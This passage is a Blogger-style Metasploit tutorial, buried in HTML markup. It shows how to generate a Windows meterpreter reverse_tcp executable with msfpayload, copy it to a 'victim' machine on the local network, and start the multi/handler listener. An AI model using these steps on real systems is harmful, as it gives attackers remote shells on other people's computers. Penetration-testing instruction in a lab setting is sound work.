&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Have a note of it.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now,&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Launch msfconsole by going to&amp;nbsp;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Applications&lt;/i&gt;&amp;gt;&amp;gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Backtrack&lt;/i&gt;&amp;gt;&amp;gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Metasploit Engineering Framework&lt;/i&gt;&amp;gt;&amp;gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Framework Version 3&lt;/i&gt;&amp;gt;&amp;gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msfconsole&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; font-style: normal; font-weight: normal; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXlOfNRsvn8U2o0SlId-fgIOgvS3CFSjKov4ujaVNp9vqhnCfKTDXuIbY2AIdS9rDxJolu4Wa3FygOyUcjNjlHp00Ja32evfZ1qxC4q12UhR2hN-e7dZyGTH-6hccmet-7ErtNOSLjJo2/s1600/1.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584371654488245650&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXlOfNRsvn8U2o0SlId-fgIOgvS3CFSjKov4ujaVNp9vqhnCfKTDXuIbY2AIdS9rDxJolu4Wa3FygOyUcjNjlHp00Ja32evfZ1qxC4q12UhR2hN-e7dZyGTH-6hccmet-7ErtNOSLjJo2/s320/1.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 258px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;You should now be having a shell something similar to a command prompt in windows.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHcVABQ0dmnyU4FuR2thXzzL9e3ejeAfjwclePzmAhi4HCkbTR4_vgYUUYSKaXPeVtu8442zMe7o7G8v9iU9tiEIoOsX9XXQrCycBRXveBKKjxdeyzZLS_n6ZH7QagSumDvbv1e22cQYPc/s1600/2.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584371953438736498&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHcVABQ0dmnyU4FuR2thXzzL9e3ejeAfjwclePzmAhi4HCkbTR4_vgYUUYSKaXPeVtu8442zMe7o7G8v9iU9tiEIoOsX9XXQrCycBRXveBKKjxdeyzZLS_n6ZH7QagSumDvbv1e22cQYPc/s320/2.JPG&quot; style=&quot;background-color: transparent; border: none; display: block; height: 239px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; font-family: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Open another shell window (”Session&amp;gt;&amp;gt;New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)&lt;/span&gt;&lt;/div&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYsL4dfc-Od8xf2zQNZC8p-SQxbZ7EFQk8SYsw95ROSxtTX6Z3A6Q89ttnQ-4CSTdkXmE7gQG9TBXU0EhBkF8GhCkJPs6vqn97qxx8AnA01H5OiwLoMpg_IGnOAWI1Uw2mt6HHEcyHPAQz/s1600/newshell.JPG&quot; style=&quot;background-color: white; border: none; color: #c11b17; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584371958210123698&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYsL4dfc-Od8xf2zQNZC8p-SQxbZ7EFQk8SYsw95ROSxtTX6Z3A6Q89ttnQ-4CSTdkXmE7gQG9TBXU0EhBkF8GhCkJPs6vqn97qxx8AnA01H5OiwLoMpg_IGnOAWI1Uw2mt6HHEcyHPAQz/s320/newshell.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;i style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x &amp;gt; /root/reverse_tcp.exe&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Your local IP is the one you noted earlier and for port you could select 4444.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;(Everything has to be entered without quotes)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;You should get something like this:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Created by msfpayload (&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://www.metasploit.com/&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: blue; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;http://www.metasploit.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;).&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Payload: windows/meterpreter/reverse_tcp&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Length: 290&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Options: LHOST=192.168.255.130,LPORT=4444&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;root@bt:/opt/metasploit3/msf3#&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhipZ2uTA5IiQ2JFyBVGq_h3YMnNrNNZUSZ8PT7fMDL2XlINl_J8PVG41atfyANiAlzY_fVtk4EJncscO-N2VDJzQveR27QE1dmO9KMpYpMSoJbaTHhVVzG2HwQ-TAwWL2XttBOl-TGyMfr/s1600/desk.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584372762420838034&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhipZ2uTA5IiQ2JFyBVGq_h3YMnNrNNZUSZ8PT7fMDL2XlINl_J8PVG41atfyANiAlzY_fVtk4EJncscO-N2VDJzQveR27QE1dmO9KMpYpMSoJbaTHhVVzG2HwQ-TAwWL2XttBOl-TGyMfr/s320/desk.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 240px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr00z_2vHAye-g8N8KPM8365Jd5dDyUuMkaev2Bf7JmAW4EKJLVVct0MBAYpSoM9fh2k25KKbTem3mKsPUdGiF2sgL1hdJifgNyxDIlMZGlxWRMux1B1-lBiUU8ANC2JxkCdtZVTHECGft/s1600/download.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;185&quot; id=&quot;BLOGGER_PHOTO_ID_5584372756578745202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr00z_2vHAye-g8N8KPM8365Jd5dDyUuMkaev2Bf7JmAW4EKJLVVct0MBAYpSoM9fh2k25KKbTem3mKsPUdGiF2sgL1hdJifgNyxDIlMZGlxWRMux1B1-lBiUU8ANC2JxkCdtZVTHECGft/s400/download.JPG&quot; style=&quot;background-color: transparent; border: none; display: block; height: 148px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoLQvPz2PM7GgO5a3rBYgWbO2nSSkLtC2v0QL9GvltE2M969wYyCt3WxXT_fXRi0Y-jWYm8roEMdhOulZCYtFdITBfA0SpTpamhSktmzpagoVwNQ2if0KWqfhh4n6DuDycvg4VF7PdQEEW/s1600/open.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584372765674430994&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoLQvPz2PM7GgO5a3rBYgWbO2nSSkLtC2v0QL9GvltE2M969wYyCt3WxXT_fXRi0Y-jWYm8roEMdhOulZCYtFdITBfA0SpTpamhSktmzpagoVwNQ2if0KWqfhh4n6DuDycvg4VF7PdQEEW/s320/open.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 242px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now open the 1&lt;span style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;st&lt;/span&gt;&amp;nbsp;shell window with msfconsole in it.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf &amp;gt;&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Type the following:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf &amp;gt; use exploit/multi/handler&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
